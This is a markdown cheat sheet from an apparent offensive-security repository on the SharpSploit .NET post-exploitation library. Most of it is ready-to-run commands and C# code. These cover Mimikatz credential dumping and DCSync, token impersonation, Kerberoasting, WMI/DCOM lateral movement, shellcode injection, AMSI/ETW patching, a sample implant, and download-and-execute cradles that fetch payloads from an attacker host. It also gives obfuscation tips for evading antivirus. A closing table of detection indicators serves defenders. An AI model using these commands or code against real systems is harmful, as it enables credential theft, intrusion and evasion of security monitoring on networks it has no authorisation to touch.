daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

sharpsploit.md (28606B)


      1 ---
      2 title: "SharpSploit"
      3 description: "SharpSploit .NET post-exploitation library: execution, credentials, enumeration and evasion APIs."
      4 category: tools
      5 tags: [post-exploitation, dotnet, offensive]
      6 tools: [SharpSploit]
      7 difficulty: advanced
      8 updated: "2026-08-09"
      9 source: "vault:ActiveDirectory/SharpSploit.md"
     10 ---
     11 
     12 # ๐Ÿ—ก๏ธ SharpSploit โ€” Complete Cheat Sheet
     13 > **Author:** Netrunner | **Tags:** `C#` `Post-Exploitation` `.NET` `Red Team` `AD`
     14 
     15 ---
     16 
     17 ## ๐Ÿ“‹ Table of Contents
     18 1. [What is SharpSploit?](#what-is-sharpsploit)
     19 2. [Architecture โ€” Library vs Console](#architecture--library-vs-console)
     20 3. [Compilation & Setup](#compilation--setup)
     21 4. [Using SharpSploitConsole (Interactive)](#using-sharpsploitconsole-interactive)
     22 5. [Credentials โ€” Mimikatz & Token Manipulation](#credentials--mimikatz--token-manipulation)
     23 6. [Enumeration โ€” Host, Domain, Network](#enumeration--host-domain-network)
     24 7. [Execution โ€” Shell, PowerShell, Assembly, Shellcode](#execution--shell-powershell-assembly-shellcode)
     25 8. [Lateral Movement โ€” WMI, DCOM, SCM, PSRemoting](#lateral-movement--wmi-dcom-scm-psremoting)
     26 9. [Evasion โ€” AMSI & ETW Patching](#evasion--amsi--etw-patching)
     27 10. [Building Custom Tooling (Library Usage)](#building-custom-tooling-library-usage)
     28 11. [Delivery & In-Memory Execution](#delivery--in-memory-execution)
     29 12. [OPSEC Tips](#opsec-tips)
     30 13. [Detection & Indicators](#detection--indicators)
     31 14. [Common Errors & Fixes](#common-errors--fixes)
     32 15. [Quick Reference Card](#quick-reference-card)
     33 
     34 ---
     35 
     36 ## What is SharpSploit?
     37 
     38 SharpSploit is a **.NET post-exploitation library** written in C# by Ryan Cobb (@cobbr) at SpecterOps. It is designed as a **DLL** โ€” not a standalone executable โ€” providing a rich API for offensive operations from managed code.
     39 
     40 **Key design points:**
     41 - Written as a class library (`.dll`) meant to be referenced by other C# projects
     42 - Wraps native Win32/NT APIs using P/Invoke and D/Invoke (DynamicInvoke)
     43 - Bundles an embedded Mimikatz PE for credential operations
     44 - Targets **.NET Framework 3.5 and 4.0** for maximum Windows compatibility
     45 - Organized into namespaces mirroring post-exploitation phases
     46 
     47 **Namespaces at a glance:**
     48 
     49 | Namespace | Purpose |
     50 |-----------|---------|
     51 | `SharpSploit.Credentials` | Mimikatz, Token manipulation, credential harvesting |
     52 | `SharpSploit.Enumeration` | Host, Domain (LDAP), Network, Clipboard enumeration |
     53 | `SharpSploit.Execution` | Shell commands, PowerShell, Assembly loading, Shellcode, Process injection |
     54 | `SharpSploit.LateralMovement` | WMI, DCOM, SCM, PowerShell Remoting |
     55 | `SharpSploit.Evasion` | AMSI bypass, ETW patching |
     56 
     57 > **GitHub:** `https://github.com/cobbr/SharpSploit`
     58 > **API Docs:** `https://sharpsploit.cobbr.io/api/index.html`
     59 
     60 ---
     61 
     62 ## Architecture โ€” Library vs Console
     63 
     64 ### SharpSploit (The Library)
     65 - A `.dll` โ€” you reference it in your own C# project and call methods programmatically
     66 - Maximum flexibility but requires C# development knowledge
     67 - Ideal for custom implants, C2 integration, and bespoke tooling
     68 
     69 ### SharpSploitConsole (The Wrapper)
     70 - Created by **@anthemtotheego** and **@g0ldengunsec**
     71 - A standalone `.exe` that wraps SharpSploit methods into a CLI interface
     72 - Designed for operators who need quick access without writing C#
     73 - Supports both **interactive mode** and **non-interactive one-liner mode**
     74 - GitHub: `https://github.com/anthemtotheego/SharpSploitConsole`
     75 
     76 **When to use which:**
     77 | Scenario | Use |
     78 |----------|-----|
     79 | Quick cred dump from a beacon | SharpSploitConsole |
     80 | Building a custom C2 implant | SharpSploit library |
     81 | One-off lateral movement | SharpSploitConsole |
     82 | Integrating into Covenant/Sliver | SharpSploit library |
     83 | Learning/testing capabilities | SharpSploitConsole |
     84 
     85 ---
     86 
     87 ## Compilation & Setup
     88 
     89 ### Compiling SharpSploit (the DLL)
     90 
     91 ```powershell
     92 # Clone the repo
     93 git clone https://github.com/cobbr/SharpSploit.git
     94 cd SharpSploit
     95 
     96 # Open in Visual Studio
     97 # File โ†’ Open โ†’ Solution โ†’ SharpSploit.sln
     98 
     99 # Build settings:
    100 #   Configuration: Release
    101 #   Platform: Any CPU (or match target arch: x64/x86)
    102 #   Target Framework: .NET Framework 3.5 or 4.0
    103 
    104 # Build โ†’ Build Solution (Ctrl+Shift+B)
    105 # Output: bin\Release\SharpSploit.dll
    106 ```
    107 
    108 ### Compiling SharpSploitConsole
    109 
    110 ```powershell
    111 # Clone the console wrapper
    112 git clone https://github.com/anthemtotheego/SharpSploitConsole.git
    113 cd SharpSploitConsole
    114 
    115 # Open SharpSploitConsole.sln in Visual Studio
    116 # Ensure SharpSploit.dll is referenced (should be included)
    117 # Build โ†’ Release โ†’ Any CPU
    118 
    119 # Optional: Merge into single EXE using Costura.Fody or ILMerge
    120 # Costura.Fody is often pre-configured โ€” just build and it embeds DLLs
    121 ```
    122 
    123 ### .NET Framework Compatibility
    124 
    125 | Target OS | Default .NET | Recommended Build Target |
    126 |-----------|-------------|--------------------------|
    127 | Windows 7 / Server 2008 R2 | 3.5 | .NET 3.5 |
    128 | Windows 8.1 / Server 2012 R2 | 4.5 | .NET 4.0 |
    129 | Windows 10 / Server 2016+ | 4.6+ | .NET 4.0 |
    130 | Windows 11 / Server 2022 | 4.8 | .NET 4.0 |
    131 
    132 > **Tip:** Build for .NET 3.5 if you want max compat. Build for .NET 4.0 if you need newer API features.
    133 
    134 ---
    135 
    136 ## Using SharpSploitConsole (Interactive)
    137 
    138 SharpSploitConsole provides a pre-built CLI wrapper around SharpSploit methods. It supports two modes: **interactive** (pseudo-shell) and **non-interactive** (single command).
    139 
    140 ### Starting Interactive Mode
    141 
    142 ```powershell
    143 # Launch the console and enter interactive mode
    144 SharpSploitConsole.exe Interact
    145 
    146 # You'll get a prompt like:
    147 # SharpSploit > _
    148 
    149 # Type commands directly at the prompt
    150 # Commands are CASE-INSENSITIVE
    151 ```
    152 
    153 ### Non-Interactive Mode (Single Command)
    154 
    155 ```powershell
    156 # Run a single command and exit โ€” ideal for C2 beacons
    157 SharpSploitConsole.exe whoami
    158 SharpSploitConsole.exe logonPasswords
    159 SharpSploitConsole.exe Shell "net user /domain"
    160 SharpSploitConsole.exe Kerberoast
    161 ```
    162 
    163 ### Full SharpSploitConsole Command Reference
    164 
    165 #### System & Identity
    166 ```powershell
    167 # Get current user context
    168 SharpSploitConsole.exe whoami
    169 
    170 # Escalate to SYSTEM (requires admin)
    171 SharpSploitConsole.exe GetSystem
    172 
    173 # Impersonate another process's token (requires admin + PID)
    174 SharpSploitConsole.exe Impersonate <PID>
    175 ```
    176 
    177 #### Command Execution
    178 ```powershell
    179 # Execute a shell command (cmd.exe)
    180 SharpSploitConsole.exe Shell "whoami /all"
    181 SharpSploitConsole.exe Shell "net group \"Domain Admins\" /domain"
    182 SharpSploitConsole.exe Shell "ipconfig /all"
    183 
    184 # Execute PowerShell (bypasses AMSI, ScriptBlock logging, Module logging)
    185 SharpSploitConsole.exe PowerShell "Get-Process"
    186 SharpSploitConsole.exe PowerShell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.x/script.ps1')"
    187 ```
    188 
    189 #### Credential Dumping (Requires Admin/SYSTEM)
    190 ```powershell
    191 # Run ALL Mimikatz credential modules (except DCSync)
    192 SharpSploitConsole.exe Mimi-All
    193 
    194 # Run specific Mimikatz command
    195 SharpSploitConsole.exe Mimi-Command "privilege::debug sekurlsa::logonPasswords"
    196 SharpSploitConsole.exe Mimi-Command "lsadump::dcsync /user:DOMAIN\krbtgt"
    197 SharpSploitConsole.exe Mimi-Command "sekurlsa::ekeys"
    198 
    199 # Dump logon passwords (privilege::debug + sekurlsa::logonPasswords)
    200 SharpSploitConsole.exe logonPasswords
    201 
    202 # Dump SAM database hashes (local accounts)
    203 SharpSploitConsole.exe SamDump
    204 
    205 # Dump LSA Secrets (service account passwords, autologon, etc.)
    206 SharpSploitConsole.exe LsaSecrets
    207 
    208 # Dump LSA Cache (domain cached credentials โ€” DCC2 hashes)
    209 SharpSploitConsole.exe LsaCache
    210 
    211 # Dump Wdigest credentials
    212 SharpSploitConsole.exe Wdigest
    213 ```
    214 
    215 #### Kerberoasting
    216 ```powershell
    217 # Kerberoast all service accounts with SPNs
    218 SharpSploitConsole.exe Kerberoast
    219 ```
    220 
    221 #### Lateral Movement (Requires Admin on Target)
    222 ```powershell
    223 # Execute command via WMI on a remote host
    224 SharpSploitConsole.exe WMI <computername> <username> <password> <command>
    225 # Example:
    226 SharpSploitConsole.exe WMI DC01 PAINTERS\admin P@ssw0rd "whoami"
    227 
    228 # Execute command via DCOM on a remote host
    229 SharpSploitConsole.exe DCOM <computername> <command> <directory> <params>
    230 # Example:
    231 SharpSploitConsole.exe DCOM DC01 "cmd.exe" "C:\Windows\System32" "/c whoami"
    232 ```
    233 
    234 #### Network Enumeration
    235 ```powershell
    236 # Get members of a local group on a remote host
    237 SharpSploitConsole.exe NetLocalGroupMembers <computername> <groupname> <username> <password>
    238 # Example:
    239 SharpSploitConsole.exe NetLocalGroupMembers DC01 Administrators PAINTERS\user P@ss
    240 
    241 # List local groups on a remote host
    242 SharpSploitConsole.exe NetLocalGroups <computername> <username> <password>
    243 
    244 # List currently logged-on users on a remote host
    245 SharpSploitConsole.exe NetLoggedOnUsers <computername> <username> <password>
    246 
    247 # List active sessions on a remote host
    248 SharpSploitConsole.exe NetSessions <computername> <username> <password>
    249 ```
    250 
    251 ### Interactive Mode Full Workflow Example
    252 
    253 ```
    254 C:\Tools> SharpSploitConsole.exe Interact
    255 
    256 SharpSploit > whoami
    257 PAINTERS\svc_admin
    258 
    259 SharpSploit > GetSystem
    260 [+] Successfully impersonated: NT AUTHORITY\SYSTEM
    261 
    262 SharpSploit > logonPasswords
    263   Authentication Id : 0 ; 999 (00000000:000003e7)
    264   Session           : UndefinedLogonType
    265   User Name         : DC01$
    266   Domain            : PAINTERS
    267    * Username : Administrator
    268    * Domain   : PAINTERS
    269    * NTLM     : aad3b435b51404eeaad3b435b51404ee
    270    * SHA1     : ...
    271 
    272 SharpSploit > SamDump
    273 Administrator:500:aad3b4...
    274 Guest:501:aad3b4...
    275 
    276 SharpSploit > Shell "net group \"Domain Admins\" /domain"
    277 Members: Administrator  svc_admin
    278 
    279 SharpSploit > Kerberoast
    280 $krb5tgs$23$*svc_sql$PAINTERS.HTB$...
    281 
    282 SharpSploit > WMI DC02 PAINTERS\Administrator P@ssw0rd "whoami"
    283 painters\administrator
    284 
    285 SharpSploit > exit
    286 ```
    287 
    288 ---
    289 
    290 ## Credentials โ€” Mimikatz & Token Manipulation
    291 
    292 ### Using as a Library (C# Code)
    293 
    294 ```csharp
    295 using SharpSploit.Credentials;
    296 
    297 // === MIMIKATZ OPERATIONS ===
    298 
    299 // Dump logon passwords (sekurlsa::logonPasswords)
    300 string result = Mimikatz.LogonPasswords();
    301 Console.WriteLine(result);
    302 
    303 // Run any arbitrary Mimikatz command
    304 string dcsync = Mimikatz.Command("lsadump::dcsync /user:PAINTERS\\krbtgt");
    305 string ekeys  = Mimikatz.Command("sekurlsa::ekeys");
    306 string cache  = Mimikatz.Command("lsadump::cache");
    307 string sam    = Mimikatz.Command("lsadump::sam");
    308 
    309 // Dump all credentials at once (logonpasswords + sam + cache + secrets + wdigest)
    310 string all = Mimikatz.All();
    311 
    312 // Dump SAM hashes
    313 string samDump = Mimikatz.SamDump();
    314 
    315 // Dump LSA Secrets
    316 string secrets = Mimikatz.LsaSecrets();
    317 
    318 // Dump LSA Cache (DCC2)
    319 string lsaCache = Mimikatz.LsaCache();
    320 
    321 // Dump Wdigest
    322 string wdigest = Mimikatz.Wdigest();
    323 
    324 
    325 // === TOKEN MANIPULATION ===
    326 
    327 // Create a Tokens object
    328 Tokens tokens = new Tokens();
    329 
    330 // Escalate to SYSTEM (requires admin)
    331 bool gotSystem = tokens.GetSystem();
    332 
    333 // Impersonate a specific user by finding their process token
    334 bool impersonated = tokens.ImpersonateUser("PAINTERS\\Administrator");
    335 
    336 // Impersonate a process by PID
    337 bool impersonatedProc = tokens.ImpersonateProcess(1234);
    338 
    339 // Create a new logon token with known credentials
    340 bool madeToken = tokens.MakeToken("PAINTERS\\svc_sql", "Password123!");
    341 
    342 // Revert impersonation back to original context
    343 bool reverted = tokens.RevertToSelf();
    344 
    345 // Enable a specific token privilege
    346 tokens.EnableTokenPrivilege("SeDebugPrivilege");
    347 
    348 // List available token privileges
    349 string privs = tokens.WhoAmI();
    350 ```
    351 
    352 ---
    353 
    354 ## Enumeration โ€” Host, Domain, Network
    355 
    356 ### Host Enumeration
    357 
    358 ```csharp
    359 using SharpSploit.Enumeration;
    360 
    361 // Get list of running processes
    362 string procs = Host.GetProcessList();
    363 
    364 // Get current directory
    365 string cwd = Host.GetCurrentDirectory();
    366 
    367 // Get hostname
    368 string hostname = Host.GetHostname();
    369 
    370 // Get username
    371 string user = Host.GetUsername();
    372 
    373 // Get OS version info
    374 string os = Host.GetOSVersion();
    375 
    376 // List files in a directory
    377 string files = Host.GetDirectoryListing("C:\\Users");
    378 
    379 // Read a file
    380 string content = Host.ReadFile("C:\\Users\\admin\\Desktop\\flag.txt");
    381 
    382 // Get registry value
    383 string regVal = Host.GetRegistryKey("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName");
    384 
    385 // Monitor clipboard (returns clipboard contents)
    386 string clipboard = Host.GetClipboard();
    387 ```
    388 
    389 ### Domain Enumeration (LDAP)
    390 
    391 ```csharp
    392 using SharpSploit.Enumeration;
    393 
    394 // Get domain users
    395 string users = Domain.GetDomainUsers();
    396 
    397 // Get domain groups
    398 string groups = Domain.GetDomainGroups();
    399 
    400 // Get domain computers
    401 string computers = Domain.GetDomainComputers();
    402 
    403 // Custom LDAP search
    404 string search = Domain.LDAPSearch("(&(objectClass=user)(adminCount=1))", "DC=painters,DC=htb");
    405 
    406 // Get members of a specific group
    407 string daMembers = Domain.GetDomainGroupMembers("Domain Admins");
    408 
    409 // Get domain trusts
    410 string trusts = Domain.GetDomainTrusts();
    411 
    412 // Get domain controllers
    413 string dcs = Domain.GetDomainControllers();
    414 
    415 // Get SPNs (useful for Kerberoasting prep)
    416 string spns = Domain.GetDomainUserSPNs();
    417 ```
    418 
    419 ### Network Enumeration
    420 
    421 ```csharp
    422 using SharpSploit.Enumeration;
    423 
    424 // Ping a host
    425 bool alive = Network.Ping("10.10.10.1");
    426 
    427 // Port scan a host
    428 string openPorts = Network.PortScan("10.10.10.1", new int[] { 21, 22, 80, 135, 389, 445, 3389, 5985 });
    429 
    430 // Get local group members on a remote host
    431 string members = Network.GetNetLocalGroupMembers("DC01", "Administrators");
    432 
    433 // Get logged-on users on a remote host
    434 string loggedOn = Network.GetNetLoggedOnUsers("DC01");
    435 
    436 // Get sessions on a remote host
    437 string sessions = Network.GetNetSessions("DC01");
    438 ```
    439 
    440 ---
    441 
    442 ## Execution โ€” Shell, PowerShell, Assembly, Shellcode
    443 
    444 ### Shell Command Execution
    445 
    446 ```csharp
    447 using SharpSploit.Execution;
    448 
    449 // Execute a cmd.exe command
    450 string output = Shell.ShellExecute("whoami /all");
    451 string output2 = Shell.ShellExecute("net user /domain");
    452 string output3 = Shell.ShellExecute("ipconfig /all");
    453 
    454 // Execute and capture stderr as well
    455 string result = Shell.ShellExecute("dir C:\\Users");
    456 ```
    457 
    458 ### PowerShell Execution
    459 
    460 ```csharp
    461 using SharpSploit.Execution;
    462 
    463 // Execute a PowerShell command (bypasses AMSI, ScriptBlock logging, Module logging)
    464 string psOutput = Shell.PowerShellExecute("Get-Process | Select-Object Name,Id");
    465 
    466 // Execute PowerShell script from string
    467 string psScript = @"
    468     $users = Get-ADUser -Filter * -Properties AdminCount
    469     $users | Where-Object { $_.AdminCount -eq 1 } | Select Name
    470 ";
    471 string psResult = Shell.PowerShellExecute(psScript);
    472 
    473 // Download and execute (cradle)
    474 string cradle = Shell.PowerShellExecute(
    475     "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.x/PowerView.ps1'); Get-DomainUser -AdminCount"
    476 );
    477 ```
    478 
    479 ### .NET Assembly Loading (In-Memory Execution)
    480 
    481 ```csharp
    482 using SharpSploit.Execution;
    483 
    484 // Load a .NET assembly from bytes and execute
    485 byte[] assemblyBytes = File.ReadAllBytes("Rubeus.exe");
    486 Assembly.AssemblyExecute(assemblyBytes, new string[] { "kerberoast", "/outfile:hashes.txt" });
    487 
    488 // Load from a URL
    489 byte[] assemblyFromWeb = new System.Net.WebClient().DownloadData("http://10.10.14.x/Seatbelt.exe");
    490 Assembly.AssemblyExecute(assemblyFromWeb, new string[] { "-group=all" });
    491 
    492 // Load a .NET DLL and call a specific method
    493 Assembly.AssemblyExecute(dllBytes, "ClassName", "MethodName", new object[] { "arg1", "arg2" });
    494 ```
    495 
    496 ### Shellcode Execution
    497 
    498 ```csharp
    499 using SharpSploit.Execution;
    500 
    501 // Execute raw shellcode in current process
    502 byte[] shellcode = new byte[] { 0xfc, 0x48, 0x83, ... };
    503 ShellCode.ShellCodeExecute(shellcode);
    504 
    505 // Process injection โ€” inject shellcode into a remote process
    506 Injection.Inject(shellcode, targetPID);
    507 ```
    508 
    509 ### D/Invoke (Dynamic Invocation)
    510 
    511 ```csharp
    512 using SharpSploit.Execution.DynamicInvoke;
    513 
    514 // Dynamically invoke Win32 API without P/Invoke signatures
    515 // Avoids static analysis / IAT hooks
    516 object[] funcArgs = { processHandle, baseAddress, regionSize, allocationType, protection };
    517 IntPtr result = (IntPtr)Win32.DynamicAPIInvoke("kernel32.dll", "VirtualAllocEx", 
    518     typeof(Win32.Delegates.VirtualAllocEx), ref funcArgs);
    519 
    520 // Invoke NT API
    521 object[] ntArgs = { processHandle, ref baseAddress, IntPtr.Zero, ref regionSize, allocationType, protection };
    522 uint ntStatus = (uint)Native.LdrGetDllHandle("ntdll.dll", "NtAllocateVirtualMemory",
    523     typeof(Native.Delegates.NtAllocateVirtualMemory), ref ntArgs);
    524 ```
    525 
    526 ---
    527 
    528 ## Lateral Movement โ€” WMI, DCOM, SCM, PSRemoting
    529 
    530 ```csharp
    531 using SharpSploit.LateralMovement;
    532 
    533 // === WMI LATERAL MOVEMENT ===
    534 // Execute a command on a remote host via WMI (requires admin)
    535 string wmiResult = WMI.WMIExecute("DC01", "whoami", "PAINTERS\\Administrator", "P@ssw0rd");
    536 
    537 // === DCOM LATERAL MOVEMENT ===
    538 // Execute via DCOM (MMC20.Application / ShellWindows / ShellBrowserWindow)
    539 DCOM.DCOMExecute("DC01", "cmd.exe /c whoami > C:\\output.txt", "C:\\Windows\\System32");
    540 
    541 // === SCM (Service Control Manager) ===
    542 // Create and start a service on a remote host
    543 // Requires admin on target + SMB access
    544 // Note: Creates Windows Event logs for service creation
    545 
    546 // === PowerShell Remoting ===
    547 // Execute via WinRM/PSRemoting
    548 string psRemoteResult = PowerShellRemoting.InvokeCommand("DC01", "whoami; hostname");
    549 ```
    550 
    551 ### Lateral Movement via SharpSploitConsole
    552 
    553 ```powershell
    554 # WMI โ€” execute command on remote host
    555 SharpSploitConsole.exe WMI DC01 "PAINTERS\admin" "P@ssw0rd" "whoami"
    556 SharpSploitConsole.exe WMI DC01 "PAINTERS\admin" "P@ssw0rd" "net localgroup administrators"
    557 
    558 # DCOM โ€” execute via DCOM object
    559 SharpSploitConsole.exe DCOM DC01 "cmd.exe" "C:\Windows\System32" "/c whoami > C:\temp\out.txt"
    560 ```
    561 
    562 ---
    563 
    564 ## Evasion โ€” AMSI & ETW Patching
    565 
    566 ```csharp
    567 using SharpSploit.Evasion;
    568 
    569 // Patch AMSI (AmsiScanBuffer) in current process
    570 // Prevents PowerShell/AMSI from scanning loaded scripts
    571 Amsi.PatchAmsiScanBuffer();
    572 
    573 // Patch ETW (EtwEventWrite) to suppress event logging
    574 // Prevents .NET assembly loads from generating ETW events
    575 Etw.PatchEtw();
    576 ```
    577 
    578 **Why this matters:**
    579 - AMSI patch = PowerShell commands executed via `Shell.PowerShellExecute()` won't be scanned
    580 - ETW patch = In-memory .NET assembly loads won't generate `Microsoft-Windows-DotNETRuntime` events
    581 - Both should be called **early** before any other operations
    582 
    583 ---
    584 
    585 ## Building Custom Tooling (Library Usage)
    586 
    587 ### Minimal C# Implant Example
    588 
    589 ```csharp
    590 using System;
    591 using SharpSploit.Credentials;
    592 using SharpSploit.Enumeration;
    593 using SharpSploit.Execution;
    594 using SharpSploit.Evasion;
    595 
    596 namespace CustomImplant
    597 {
    598     class Program
    599     {
    600         static void Main(string[] args)
    601         {
    602             // Step 1: Patch defenses
    603             Amsi.PatchAmsiScanBuffer();
    604             Etw.PatchEtw();
    605 
    606             // Step 2: Enumerate
    607             Console.WriteLine("[*] Current User: " + Host.GetUsername());
    608             Console.WriteLine("[*] Hostname: " + Host.GetHostname());
    609             Console.WriteLine("[*] OS: " + Host.GetOSVersion());
    610 
    611             // Step 3: Check if we're admin
    612             string privs = Shell.ShellExecute("whoami /priv");
    613             if (privs.Contains("SeDebugPrivilege"))
    614             {
    615                 Console.WriteLine("[+] Running as admin โ€” dumping creds");
    616 
    617                 // Escalate to SYSTEM
    618                 Tokens tokens = new Tokens();
    619                 tokens.GetSystem();
    620 
    621                 // Dump everything
    622                 Console.WriteLine(Mimikatz.LogonPasswords());
    623                 Console.WriteLine(Mimikatz.SamDump());
    624 
    625                 // Revert
    626                 tokens.RevertToSelf();
    627             }
    628 
    629             // Step 4: Domain Enumeration
    630             Console.WriteLine("[*] Domain Admins:");
    631             Console.WriteLine(Domain.GetDomainGroupMembers("Domain Admins"));
    632 
    633             // Step 5: Kerberoast
    634             Console.WriteLine("[*] SPNs found:");
    635             Console.WriteLine(Domain.GetDomainUserSPNs());
    636         }
    637     }
    638 }
    639 ```
    640 
    641 ### Visual Studio Project Setup
    642 
    643 ```
    644 1. File โ†’ New โ†’ Console App (.NET Framework)
    645 2. Target Framework: .NET Framework 4.0
    646 3. Solution Explorer โ†’ References โ†’ Add Reference โ†’ Browse
    647 4. Select SharpSploit.dll
    648 5. Write your code using SharpSploit namespaces
    649 6. Build โ†’ Release
    650 
    651 # Single-file merge (optional):
    652 # Install Costura.Fody via NuGet:
    653 Install-Package Costura.Fody
    654 # Rebuild โ€” SharpSploit.dll is now embedded in your .exe
    655 ```
    656 
    657 ---
    658 
    659 ## Delivery & In-Memory Execution
    660 
    661 ### Drop to Disk
    662 
    663 ```powershell
    664 # Download SharpSploitConsole to target
    665 certutil -urlcache -f http://10.10.14.x/SharpSploitConsole.exe C:\Windows\Temp\ssc.exe
    666 iwr -uri http://10.10.14.x/SharpSploitConsole.exe -outfile C:\Windows\Temp\ssc.exe
    667 # Via Evil-WinRM
    668 upload SharpSploitConsole.exe
    669 ```
    670 
    671 ### In-Memory via Reflection (.NET Assembly Loading)
    672 
    673 ```powershell
    674 # Load SharpSploitConsole in memory โ€” never touches disk
    675 $data = (New-Object Net.WebClient).DownloadData('http://10.10.14.x/SharpSploitConsole.exe')
    676 $assem = [System.Reflection.Assembly]::Load($data)
    677 [SharpSploitConsole.Program]::Main("logonPasswords".Split())
    678 
    679 # Or with arguments
    680 [SharpSploitConsole.Program]::Main(@("Shell", "whoami /all"))
    681 [SharpSploitConsole.Program]::Main(@("Mimi-Command", "sekurlsa::ekeys"))
    682 ```
    683 
    684 ### Via Covenant / Grunt
    685 
    686 ```
    687 # SharpSploit is the native library for Covenant C2
    688 # All Grunt tasks use SharpSploit methods under the hood
    689 
    690 # In Covenant UI:
    691 # Interact โ†’ Task โ†’ Select task (e.g., Mimikatz, ShellCmd, Assembly)
    692 # Tasks map directly to SharpSploit API calls
    693 ```
    694 
    695 ### Via execute-assembly (Cobalt Strike)
    696 
    697 ```
    698 # Load SharpSploitConsole via execute-assembly
    699 beacon> execute-assembly /path/to/SharpSploitConsole.exe logonPasswords
    700 beacon> execute-assembly /path/to/SharpSploitConsole.exe Kerberoast
    701 beacon> execute-assembly /path/to/SharpSploitConsole.exe Shell "net group \"Domain Admins\" /domain"
    702 ```
    703 
    704 ---
    705 
    706 ## OPSEC Tips
    707 
    708 ```
    709 โœ… Patch AMSI and ETW BEFORE any other SharpSploit operations
    710    Amsi.PatchAmsiScanBuffer() + Etw.PatchEtw()
    711 
    712 โœ… Use in-memory execution (Assembly.Load) โ€” avoid dropping to disk
    713    The binary is heavily signatured by every major AV/EDR
    714 
    715 โœ… Use D/Invoke (DynamicInvoke) instead of P/Invoke for API calls
    716    Avoids static IAT analysis and API hooking
    717 
    718 โœ… Obfuscate before deployment โ€” use ConfuserEx, InvisibilityCloak, or manual edits
    719    Change namespaces, class names, method names, and strings
    720 
    721 โœ… Use MakeToken() over ImpersonateUser() when you have creds
    722    MakeToken creates a new logon โ€” ImpersonateUser requires finding an existing process
    723 
    724 โœ… Always call RevertToSelf() after token impersonation
    725    Leaving orphaned impersonation tokens can cause instability
    726 
    727 โœ… Avoid Mimikatz.All() โ€” it's noisy. Use targeted calls instead
    728    LogonPasswords() or SamDump() individually as needed
    729 
    730 โœ… Use AES keys for Kerberos operations when available
    731    RC4 downgrades trigger alerts on modern EDR
    732 
    733 โš ๏ธ SharpSploitConsole is HEAVILY detected โ€” treat it as burned
    734    Build custom wrappers instead or use through C2 frameworks
    735 
    736 โš ๏ธ The embedded Mimikatz PE will trigger signature-based detection
    737    Consider replacing with NanoDump or manual LSASS techniques
    738 ```
    739 
    740 ---
    741 
    742 ## Detection & Indicators
    743 
    744 | Indicator | Details |
    745 |-----------|---------|
    746 | **Binary signatures** | SharpSploit.dll and SharpSploitConsole.exe are signatured by all major AV |
    747 | **AMSI detection** | `AmsiScanBuffer` patching triggers `Amsi.AmsiOpenSession` alerts |
    748 | **ETW events** | Assembly loads generate `Microsoft-Windows-DotNETRuntime/AssemblyLoad` events |
    749 | **Mimikatz artifacts** | `sekurlsa::logonPasswords` opens LSASS โ€” triggers Sysmon Event 10 |
    750 | **WMI lateral movement** | Generates Event 4648 (Logon with explicit credentials) + WMI events |
    751 | **Token manipulation** | Sysmon Event 8 (CreateRemoteThread) and Event 10 (ProcessAccess) |
    752 | **Kerberoasting** | Event 4769 (TGS request) with RC4 encryption type |
    753 | **Service creation** | Event 7045 (New service installed) for SCM lateral movement |
    754 | **Strings in memory** | `SharpSploit`, `cobbr`, `Mimikatz` visible in process memory |
    755 
    756 ### MITRE ATT&CK Mapping
    757 
    758 | Technique | TTP ID |
    759 |-----------|--------|
    760 | Credential Dumping (LSASS) | T1003.001 |
    761 | Token Impersonation | T1134.001 |
    762 | Kerberoasting | T1558.003 |
    763 | WMI Execution | T1047 |
    764 | DCOM Execution | T1021.003 |
    765 | PowerShell Execution | T1059.001 |
    766 | AMSI Bypass | T1562.001 |
    767 | In-Memory .NET Assembly | T1620 |
    768 
    769 ---
    770 
    771 ## Common Errors & Fixes
    772 
    773 | Error | Cause | Fix |
    774 |-------|-------|-----|
    775 | `System.BadImageFormatException` | Architecture mismatch (x86 vs x64) | Rebuild for correct platform or use AnyCPU |
    776 | `FileNotFoundException: SharpSploit.dll` | DLL not found at runtime | Embed with Costura.Fody or place DLL in same directory |
    777 | `System.TypeLoadException` | .NET Framework version mismatch | Build for .NET 3.5 if target has older Windows |
    778 | `Access Denied` on Mimikatz calls | Not running as admin/SYSTEM | Call `GetSystem()` first or ensure SeDebugPrivilege |
    779 | `AMSI blocked execution` | AMSI scanning caught the payload | Call `Amsi.PatchAmsiScanBuffer()` before execution |
    780 | `Could not load assembly` | Assembly.Load failed | Check assembly is valid .NET, not native PE |
    781 | WMI lateral movement fails | Firewall / RPC blocked | Ensure ports 135 + dynamic RPC range are open |
    782 | DCOM execution fails | DCOM not enabled on target | Check `dcomcnfg` โ€” DCOM must be enabled |
    783 | Token impersonation fails | No suitable process found for user | User must have an active session on the box |
    784 | `Unhandled Exception: System.Security.SecurityException` | CLR restrictions / CAS | Run from Full Trust context, avoid constrained language |
    785 
    786 ---
    787 
    788 ## Quick Reference Card
    789 
    790 ```
    791 โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
    792   SHARPSPLOITCONSOLE QUICK REFERENCE
    793 โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
    794 
    795 INTERACTIVE:        SharpSploitConsole.exe Interact
    796 WHOAMI:             SharpSploitConsole.exe whoami
    797 GET SYSTEM:         SharpSploitConsole.exe GetSystem
    798 IMPERSONATE:        SharpSploitConsole.exe Impersonate <PID>
    799 
    800 SHELL CMD:          SharpSploitConsole.exe Shell "<command>"
    801 POWERSHELL:         SharpSploitConsole.exe PowerShell "<command>"
    802 
    803 LOGON PASSWORDS:    SharpSploitConsole.exe logonPasswords
    804 SAM DUMP:           SharpSploitConsole.exe SamDump
    805 LSA SECRETS:        SharpSploitConsole.exe LsaSecrets
